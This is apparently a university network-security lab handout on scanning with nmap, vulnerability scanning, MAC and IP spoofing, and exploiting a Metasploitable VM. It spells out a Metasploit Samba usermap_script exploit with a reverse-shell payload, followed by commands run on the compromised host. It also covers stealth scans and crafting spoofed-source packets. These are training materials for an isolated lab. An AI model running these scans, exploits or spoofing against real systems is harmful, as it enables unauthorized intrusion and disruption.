Network and Computer

Security Laboratory
EECE 655L

Lab 2

Scanning and Enumerating the Network for

Targets and Address Spoofing
Lab 2: Scanning and Enumerating the Network for Targets and
Address Spoofing

3h

Enumerating the network, to discover what machines are attached and operating, is a useful task for
both an intruder and a system administrator. The information gained from a network scan assists in the
determination of the actual current layout. Several tools and techniques exist for both the Windows and
Linux platforms to perform these tests.
This lab will introduce you to some common and useful security tools. It will allow you to experiment
with various network scanning and enumeration tools, vulnerability scanners and automated system
exploit packages. You will also examine how a network device can be spoofed.

Prelab

Read the suggested material and the exercises in the Prelab section and submit the Prelab Answer
Sheet via Moodle before the beginning of the lab.

Readings
● Readings:
o NMAP: https://www.stationx.net/nmap-cheat-sheet/
o Metasploit: https://docs.metasploit.com/
o CVEs: https://cve.mitre.org/

Exercises
In this lab, you will learn how to locate a target machine and discover its operating system, the ports
that are open, and the types of services the machine is running. Armed with this information, you can
use the Internet to explore a wealth of sites that have listings of vulnerabilities. The vulnerabilities could
be with an operating system, service, or application. There are sites that will list not only vulnerabilities,
but the methods in which those vulnerabilities can be exploited. One such source of information is the
Common Vulnerabilities and Exposures (CVE) database. This database uniquely numbers each new
vulnerability so that it is easier to refer to the vulnerability and the solutions for them.
The CVE database is maintained by MITRE Corporation. MITRE Corporation is a non-for-profit
organization chartered to work in the public interest that specializes in engineering and information
technology. MITRE maintains a community wide effort, US-CERT (United States Computer Emergency
Readiness Team) sponsored list of vulnerabilities, and additional information.

Page 2
Vulnerabilities are known openings in systems that can be exploited by users. The discovery of new
vulnerabilities is time-consuming and difficult, but once known and published, vulnerabilities can be
easy to exploit.
In this pre-lab, we will use the Internet resources to search for vulnerabilities that exist on a target
computer and to find utilities to test those vulnerabilities. You will see during the lab sessions how we
can make use of the researched information to execute real attacks against a computer system.

1- Search Google for Information

In Google search box, type IIS 6.0 vulnerability exploits
→ What were the domain names of the top five hits.
→ Is there a vulnerability related to buffer overflow? What is Buffer Overflow?

2- Search the CVE Database

In the previous search we found many sites that specialize in reporting security vulnerabilities. You may
find that each site uses a different identifier for a particular vulnerability. The vulnerability reporting
community has found that having a single identifier for each vulnerability ensures commonality when
working on a problem involving that vulnerability. The single identifier is called CVE (Common
Vulnerabilities and Exposures).
Go to https://cve.mitre.org/ Click in the Search CVE List link then type Remote Code Execution. Click on
the submit button.
→ How many vulnerabilities did your search return? Provide a screenshot of your search result. What
was the most recent published one?
Refine your search for the specific vulnerability with the CVE of CVE-2022-42971. Read the information
regarding the vulnerability.
→ What systems/services does this vulnerability target?
→ What is Windows Remote Code Execution?
→ What are the release date and severity level of this vulnerability?
→ What exploits are available for this vulnerability? Cite the site(s) you visited to find such information.

Page 3
Part 1: Nmap – IP Scanning

80 minutes

Resources: [2].
Nmap is a popular scanning utility that is available to download from the Internet at no cost. It is a
powerful tool that includes many functions. The Nmap utility can quickly and easily gather information
about a network’s hosts, including their availability, their IP addresses, and their names. This is useful
information not only for a network administrator, but for an attacker as well, prior to an attack. One of
the first tasks a hacker will carry out is to perform a scan of the network for hosts that are running. Once
the user knows what hosts are accessible, he will then find means to gather as much information about
the host as possible.
Once an attacker has identified the hosts, ports, and services that are available, he will want to identify
the operating system that is running on the host. Nmap achieves this by using a technique called
fingerprint. Different operating systems will implement TCP/IP in slightly different ways. Though subtle,
the differentiation of these responses makes it possible to determine the operating system.
In addition to identifying the operating system, the attacker will want to gain more information about
the services that are running on the target computer, such as the type of server and version (for
example, Internet Information Server [IIS] version 5 or version 6). This information is contained in the
service’s banner. The banner is usually sent after an initial connection is made. This information greatly
improves the ability of the attacker to discover vulnerabilities and exploits.
The network traffic that is generated by Nmap can have distinct qualities. These qualities might be the
number of packets that are sent or the timing between packets, which do not resemble “normal” traffic.
These qualities make up its signature. Nmap can be configured to hide its activity over time, attempting
to mask its signature from being easily observed.
In this lab you will use Nmap to identify the computers that are on the network, enumerate the ports on
the computers that are located, and then look at the network traffic generated by these actions. You will
then use Nmap to scan the ports stealth and fully and compare the method to the previous scan. To
observe service banners, telnet and aggressive scan will be used to obtain the banners from IP/port
combinations from Nmap scans.

Learning Objectives:
After completing this lab, you will be able to:
● Use Nmap to scan a network for hosts that are up.
● Use Nmap to enumerate the ports and services available on a host.
● Identify the qualities of the Nmap ping sweep signature.
● Explain the different methods Nmap uses to enumerate the ports normally and stealth.
● Determine and interpret service information from banners via telnet and aggressive scan.

Page 4
1.1 Nmap – Enumeration and Scanning Windows server

Materials and Setup

● Windows Server 2019 Virtual machine.
● Kali Linux Virtual Machine.

Lab Steps at a Glance

Step 1: Set static IPs for the three machines.
Step 2: Enable Web, FTP and SMTP on the windows server machine.
Step 3: Use Nmap to scan the network and analyze the output with Wireshark.
Step 4: Use Nmap to scan open TCP ports and analyze the scan with Wireshark.
Step 5: Use Nmap to do a stealth scan on the computer and analyze the scan with Wireshark.
Step 6: Use Nmap to enumerate the operating system of the target computer.
Step 7: Use Telnet and aggressive scan to get the Web server, FTP server, and SMTP banners.

Lab Steps
Step 1: Set static IPs for the three machines.
a- Use the IP 192.168.0.x1 for kali
b- Use the IP 192.168.0.x3 for windows server
c- Check the connectivity between the two machines.
• Use ping utility to check the connectivity from windows server to kali
• Make sure that the Firewall is disabled on windows and use ping utility to check the
connectivity from kali to windows.
Where x is the group name, for example the IP of kali machine should be 192.168.0.11 for group 1
Step 2: Enable Web, FTP and SMTP on the windows server machine.
Start the Windows Server 2019 machine Gx_VM3_WinSrv.
a- Log on to Windows Server machine, open Server Manager and use the Internet to know how to
enable FTP, SMTP and IIS service.
b- Verify that the Windows Server machine is now listening to the three enabled services: http on
TCP port 80, ftp service on TCP port 21, and smtp on TCP port 25. Open the command prompt as
administrator and type netstat –an | more and press ENTER.

Page 5
Step 3: Use Nmap to scan the network and analyze the output with Wireshark.
We are going to launch Wireshark to capture Nmap-generated traffic and analyze how it discovers active
hosts.
a- Log on to Kali machine and run Wireshark: Go to Applications then type Wireshark.
b- On the Wireshark menu, click Capture -> Options. Uncheck the Resolve MAC name resolution
check box, make sure the appropriate interface (eth0) is selected in the Input menu and then
click the Start button to start packet capture.
c- Open the terminal and type nmap –sn 192.168.0.x1-x9 and click Scan. The –sn option tells Nmap
to perform a ping scan. Observe the output.
Q-1.1-1
→ How many hosts did Nmap find and how long did the scan take?
→ Provide a screenshot of Nmap showing scan results.
d- On the Wireshark screen click Capture -> Stop. Observe the output.
Q-1.1-2
→ Why are there so many ARP broadcasts?
→ What can you tell about the timing between broadcasts?
→ What do you notice about the source and broadcast addresses?

Step 4: Use Nmap to scan open TCP ports and analyze the scan with Wireshark.
a- Start a new capture on Wireshark. On the Save capture file before starting a new capture?
Dialog box, click Continue without Saving.
b- On terminal type nmap –sT 192.168.0.x3 and click Scan. The –sT option tells Nmap to perform a
TCP port scan. This is a full connection scan and would take some time to complete. Observe the
output.
Q-1.1-3
→ How many ports did Nmap find and how long did the scan take?
→ Provide a screenshot of nmap showing scan results.
c- On the Wireshark screen click Capture -> Stop. Observe the output. Keep the application open.
Q-1.1-4
→ How many packets did Wireshark capture?
d- Look at the signature of the scan. Notice that there are many SYN packets sent from the kali
machine 192.168.0.x1 doing the scan and RST/ACK being sent back. RST/ACK is the response for
a request to a port that is not open.

Page 6
 e- To examine the output when an open port is discovered, like port 80 the HTTP service port, we
will use Wireshark filter. In the Filter box, type tcp.port == 80 and press ENTER.
f- Look at the details of the last four packets captured. Note the SYN, SYN/ACK, and ACK packets. A
three-way handshake was completed so that the port could be established as open. This is okay,
but it is very noisy and can show up in the server logs. The last of the four packets is an RST sent
by the scanning computer.
g- Click Clear next to the Filter box.
Q-1.1-5
→ Provide a screenshot of nmap showing the above TCP scan results.
→ Configure a new FTP filter on Wireshark and provide a screenshot of the capture results.

Step 5: Use Nmap to do a stealth scan on the computer and analyze the scan with Wireshark.
a- Start a new capture on Wireshark. On the Save capture file before starting a new capture?
Dialog box, click Continue without Saving.
b- On kali terminal, type nmap –sS 192.168.0.x3 and press ENTER. Note that since this type of scan
requires Nmap to behave on the network in an atypical manner, administrative rights are
required on the scanning machine.
c- On the Wireshark screen click Capture -> Stop. Observe the output.
Q-1.1-6
→ How many ports did Nmap find and how long did the scan take? Compare these numbers with the
ones obtained from the TCP scan.
→ How many total packets were captured on Wireshark? How does this compare to the previous full
TCP capture?
h- In the Wireshark Filter box, type tcp.port == 80 and press ENTER.
i- Look at the details of the last three packets and this time note that the three-way handshake is
not completed. The SYN packet is sent, and the SYN/ACK is returned, but instead of sending back
an ACK, the scanning computer sends an RST. This will allow the scanning computer to establish
that the port is in fact opened but it is less likely to be registered in the server logs.
Q-1.1-7
→ Provide a screenshot of nmap showing the above scan results.
→ Configure a new FTP filter on Wireshark and provide a screenshot of the capture results.
j- Close Wireshark and do not save the results.

Page 7
Step 6: Use Nmap to enumerate the operating system of the target computer.
a- From the Nmap, type nmap –O 192.168.0.x3 and press ENTER. The –O option tells Nmap to
perform the scan and guess what operating system is on the computer. Observe the output.
Q-1.1-8
→ What was the guess made by Nmap? Was it correct? Check the system information on the Windows
Server machine to verify the operating system version.
→ Provide a screenshot of nmap showing scan results.

Step 7: Use Nmap aggressive scan and telnet to get the Web server, FTP server, and SMTP server
banners.
a- On kali machine terminal window, type nmap -sT -A 192.168.0.x3 -p 80 and press ENTER.
Q-1.1-9
→ What Web server is being used? What version of the Web server is being used?
→ Provide a screenshot of the output
b- On Kali terminal window, type nmap -sT -A 192.168.0.x3 -p 21 and press ENTER.
Q-1.1-10
→ What FTP server is being used? What version of the server is being used? Provide a screenshot of the
output
c- On kali terminal, type telnet 192.168.0.x3 25
Q-1.1-11
→ What SMTP server is being used? What version of the server is being used? Provide a screenshot

1.2 Nmap – Scanning Ubuntu (Optional)

Materials and Setup

● Ubuntu machine.
● Kali Machine.

Lab Steps at a Glance

Step 1: Setup Web, FTP and SMTP on the ubuntu machine.
Step 2: Use Nmap to do a stealth scan on the computer and analyze the scan with Wireshark.
Step 3: Use Telnet and aggressive scan to get the versions of the FTP, SMTP and web servers.

Page 8
Lab Steps
Step 1: Setup Web, FTP and SMTP on the target Ubuntu machine.
Start Ubuntu machine.
a- Log on to Ubuntu machine and use the Internet to setup FTP, postfix (smtp) and Apache (Web).
b- At the terminal, type netstat –an | more and press ENTER to check the listening ports.
Q-1.2-1
→ Provide a screenshot of the above netstat command.

Step 2: Use Nmap to do a stealth scan on the computer and analyze the scan with Wireshark.
a- On kali machine, run Wireshark and start a new capture.
b- Open a Terminal windows and type nmap –sS 192.168.0.x2 and press ENTER.
c- On the Wireshark screen click Capture -> Stop. Observe the output.
Q-1.2-2
→ How many ports did Nmap find and how long did the scan take?
→ Provide a screenshot of Nmap showing the above scan results.
Q-1.2-3
→ Configure an SMTP filter on Wireshark and provide a screenshot of the capture results.
d- Close Wireshark and do not save the results.

Step 3: Use nmap with option -A to get the FTP, web and SMTP servers version.
a- On kali terminal, type nmap -sT -A 192.168.0.x2 -p 21 and press ENTER.
b- On kali terminal, type nmap -sT -A 192.168.0.x2 -p 80 and press ENTER.
c- On kali terminal, type nmap -sT -A 192.168.0.x2 -p 25 and press ENTER.
Q-1.2-4
Provide screenshots for the three outputs.

Page 9
Part 2: Vulnerability Scanning using nmap

40 minutes

In this lab you will use the NSE scripts to perform vulnerability scanning to discover the vulnerabilities of
a target computer and analyze the output.

Learning Objectives:
After completing this lab, you will be able to:
● Use Nmap to discover vulnerabilities in a machine.
● Analyze the output of the scan.

Materials and Setup

● Kali machine.
● Metasploitable virtual machine.

Lab Steps at a Glance

Step 1: Load Metasploitable virtual machine.
Step 2: Initial Network Scanning with Nmap.
Step 3: Vulnerability Scanning with Nmap Scripts.
Step 4: Exploiting Vulnerabilities with Metasploit

Note:
For proper resource management on the physical workstation Gx_WS1, keep only the virtual machines
needed in the exercise running and shutdown all other machines.

Lab Steps
Step 1: Load Metasploitable machine.
a- Import the image Metasploitable located under D:\VMs on virtual box. The image will run a
Linux machine with pre-configured vulnerable services that will be our target when performing
vulnerability scanning.
b- When the machine loads, press ENTER to get the login prompt. Login using the account
msfadmin and password msfadmin.
c- Assign an IP address to the machine in the range of your Network subnet. Type:
ifconfig eth0 192.168.0.x4 netmask 255.255.255.0 where x is the group name

d- Verify network connectivity by pinging the kali machine

Page 10
Step 2: Initial Network Scanning with Nmap.
a- Open terminal in kali machine and check if the target is up using nmap -sn <target_IP> where
targey_IP is the IP of the metasploitable machine
b- Identify all open ports and running services by performing a SYN scan (-sS) with -sV to identify
services.
Q-2-1
a- What is the role of the parameter -sV.
b- Include a screenshot showing the command you used.
c- What FTP server is used?
d- Provide a screenshot of the output including all services.

Step 3: Vulnerability Scanning with Nmap Scripts.

Use Nmap's powerful NSE (Nmap Scripting Engine) scripts to detect vulnerabilities on the
Metasploitable2 machine
e- On kali terminal type nmap --script vuln <target_IP>, where target_IP is the IP of the
metasploitable machine.
Q-2-2
Provide a screenshot of the output. How long did the scan take?

f- Identify known vulnerabilities like Samba, SMTP, and HTTP-related weaknesses.

Q-2-3
Include the screenshots showing the commands you used to detect the vulnerabilities for SMTP and
http?

Step 4: Use an automated exploit tool to discover vulnerabilities on a target machine and try to install
exploits.
The Metasploit Framework is the open-source penetration testing framework managed by Rapid7 with
the world's largest database of public, tested exploits. Metasploit provides useful information and tools
for penetration testers, security researchers, and IDS signature developers. The Metasploit Project aims
to provide information on exploit techniques and to create a functional knowledgebase for exploit
developers and security professionals.

Page 11
Like comparable commercial products, Metasploit can be used to test the vulnerability of computer
systems to protect them, and it can be used to break into remote systems. Like many information
security tools, Metasploit can be used for both legitimate and unauthorized activities.
The basic steps for exploiting a system using the Metasploit Framework include:
● Choosing and configuring an exploit (code that enters a target system by taking advantage of
one of its bugs
● Checking whether the intended target system is susceptible to the chosen exploit (optional)
● Choosing and configuring a payload (code that will be executed on the target system upon
successful entry, for instance a remote shell or a VNC server)
● Choosing the encoding technique to encode the payload so that the intrusion-prevention system
(IPS) will not catch the encoded payload
● Executing the exploit

This modularity of allowing to combine any exploit with any payload is the major advantage of the
Framework: it facilitates the tasks of attackers, exploit writers, and payload writers.
To choose an exploit and payload, some information about the target system is needed such as
operating system version and installed network services.

a- Type msfconsole on kali terminal.

Step 2: Using the msfconsole Interface.
On the Metasploit interface:
b- Type help to get a list of valid commands. Use the mouse to scroll and view all available
commands.
1. To list all available exploits, type show exploits.
2. To list all the available payloads, type show payloads.
3. Try the available options of the show command.
4. To obtain more information about a given exploit, type info <module name>.
c- On the msfconsole, type search samba
Q-2-4
Include the screenshot showing the output of this command.
d- To choose the exploit, type use exploit/multi/samba/usermap_script
e- Set the target IP address of the Metasploitable2 machine using set RHOST <target_IP> where
target IP is IP of the metasploitable machine.
f- Set the payload: You can use the reverse shell payload to gain control of the machine. Type
set payload cmd/unix/reverse
g- Set the local host (LHOST): Set your local IP address (IP of kali): set LHOST <attacker_ip>

Page 12
 h- Type exploit to start the exploitation process. If successful, this will give you a shell on the
Metasploitable2 machine, allowing you to run commands.
i- Check the current user by typing whoami. Provide a screenshot of the output
j- Create a directory and a file on the target machine:
a. Type cd /home/msfadmin
b. Create directory on the target machine named test: Type mkdir test
c. Create a file using vi in this directory named test.txt and add to it “you have been
hacked”
Q-2-5
Provide screenshots from the metsploitable and from kali Metasploit for the created directory and
created file

Page 13
Part 3: MAC Address Spoofing

40 minutes

In computer networking, a Media Access Control address (MAC address) is a unique identifier assigned
to most network adapters or network interface cards (NICs) by the manufacturer for identification and
used in the Media Access Control protocol sub-layer. If assigned by the manufacturer, a MAC address
usually encodes the manufacturer's registered identification number. It may also be known as an
Ethernet Hardware Address (EHA), hardware address, adapter address, or physical address.
MAC Spoofing is a technique of changing an assigned Media Access Control (MAC) address of a
networked device to a different one. The changing of the assigned MAC address may allow the
bypassing of access control lists on servers or routers, either hiding a computer on a network or allowing
it to impersonate another computer. MAC spoofing is the activity of altering the MAC address of a
network card.
One way to prevent MAC Spoofing is to monitor the network and check for consistency in ARP
messages. If an IP address is claimed by one MAC address, and later that address is claimed by a
different address, it is possible that ARP messages are being spoofed, sending a victim to the wrong
MAC address. Similarly, if a MAC address is assigned one IP and then is changed to another, it is possible
that a hacker has changed his MAC address, possibly for malicious purposes. The arp scan utility will be
used to detect MAC address changes on the network.

Learning Objectives:
After completing this lab, you will be able to:
● Change the MAC address for a network card.
● Detect MAC address changes in your network.

3.1 MAC Address Spoofing under Windows

Materials and Setup

● Windows Server machine.

Lab Steps at a Glance

Step 1: Inspect the current MAC and IP address.
Step 2: Change the MAC address.

Lab Steps
Step 1: Inspect the current MAC and IP address.
a- On Windows Server open command prompt and type ipconfig /all.

Page 14
Q-3.1-1
→ Provide a screenshot of the above command output showing the machine MAC address.

Step2: Change the MAC address

a- Go to Start -> Control Panel -> Network and Internet then Network and Sharing Center ->
Change adapter settings.
b- Double click on the Network Interface (local area network, ethernet….).
c- Click on Properties.
d- Click the Configure button of the NIC hardware and then choose the Advanced tab.
e- Highlight the Locally Administered address field and input 12 hexadecimal characters to create
your new MAC address.
f- Run ipconfig /all again and record your results.
Q-3.1-2
→ Provide a screenshot of the above command output showing the new machine MAC address.
g- Change your MAC Address back to the original value.

Q-3.1-3
→ The above MAC address change procedure might not be supported on your real physical Windows
machine. Suggest tools that would help changing Windows network interface MAC address.

3.2 MAC Address Spoofing under Linux

Materials and Setup

● Ubuntu machine.
● Kali machine.

Lab Steps at a Glance

Step 1: Inspect the current MAC and IP addresses.
Step 2: Change the MAC address.
Step 3: Run arp-scan to detect the new MAC address.
Step 4: Result interpretation.

Page 15
Lab Steps
Step 1: Inspect the current MAC and IP address.
a- On Ubuntu, open a Terminal window and type ifconfig.
Q-3.2-1
→ Provide a screenshot of the above command output showing the machine MAC address.

Step 2: Change the MAC address.

a- Type the command ifconfig <interface_name> down
b- Type the command ifconfig <interface_name> hw ether < Ethernet_address> where
ethernet_address is mac address created by you.
c- Type the command ifconfig eth0 up.
d- Type ifconfig again and record your results.
Q-3.2-2
→ Provide a screenshot of the above command output showing the new machine MAC address.

Step 3: Run arp scan to monitor for MAC address spoofing.

a- On Kali, type sudo arp-scan –interface =eth0 192.168.0.x2 on the terminal window.
b- On Ubuntu, change the MAC Address back to the original one.
c- On kali, type sudo arp-scan –interface =eth0 192.168.0.x2 on the terminal window again to
detect the change.

Step 4: Result interpretation.

a- Observe the new arp-scan output.
Q-3.2-3
Provide the screenshots showing the two mac addresses of the ubuntu machine detected on kali before
and after the change
Q-3.2-4
What would happen if two hosts on the same network had the same MAC address?
Q-3.2-5
Although it is relatively simple to forge a MAC address, it is very difficult to determine the MAC address
of a host on a subnet to which you do not already have access. Why is this true?

Page 16
Part 4: IP Address Spoofing

20 minutes

The purpose of IP Address Spoofing is usually to generate a Denial of Service (DoS) attack on a target
machine. A full communication session cannot be established with a spoofed IP.

Learning Objectives:
After completing this lab, you will be able to:
● Generate spoofed IP packets.
● Use tcpdump to sniff network traffic.

Materials and Setup

● Windows Server machine.
● Ubuntu machine.

Lab Steps at a Glance

Step 1: Install Packet Builder.
Step 2: Create a spoofed IP packet and sniff network traffic.

Lab Steps
Step 1: Install Packet Builder.
a- Copy the collasoft packet builder (zip file) from D:/Tools to your windows server winSRV
b- Extract the zip file and install packet builder on windows server machine
c- Run the Colasoft Packet Builder 2.0 application and explore its features.

Step 2: Create a spoofed IP packet and sniff network traffic.

Now you will create an IP packet using a spoofed address and send it to Ubuntu.
Log on to Ubuntu and open a Terminal window.
a- Type tcpdump host 192.168.0.1x0. The command line capture tool will start listening to the
default network interface for packets coming from the specified IP. Note that this IP does not
exist on the network.
b- Create a new packet in Packet Builder window by clicking Edit -> Add -> TCP Packet. Edit the
packet and specify the source IP as 192.168.0.1x0 and the destination IP as IP_Kali_Machine.
c- Select a random port as the source TCP port and set the destination port to be 80.
d- Right-Click on the created packet in the Packet List window and select Send Selected Packets.

Page 17
 e- Select the network Adapter and set the Burst Mode and Loop Sending values then click on
Start.
f- Watch the output of tcpdump capture on Ubuntu.
Q-4-1
→ Provide screenshots of the Packet Builder window and tcpdump output.
Q-4-2
→ What can your Internet Service Provider do to prevent users spoofed IP packets from reaching the
Internet.

Page 18
Appendix A: Lab Requirements

Lab Turn-in Checklist

✔ Prelab Answer Sheet: submitted via Moodle before the lab session.

✔ Lab Answer Sheet: submitted via Moodle at the end of the lab.

Page 19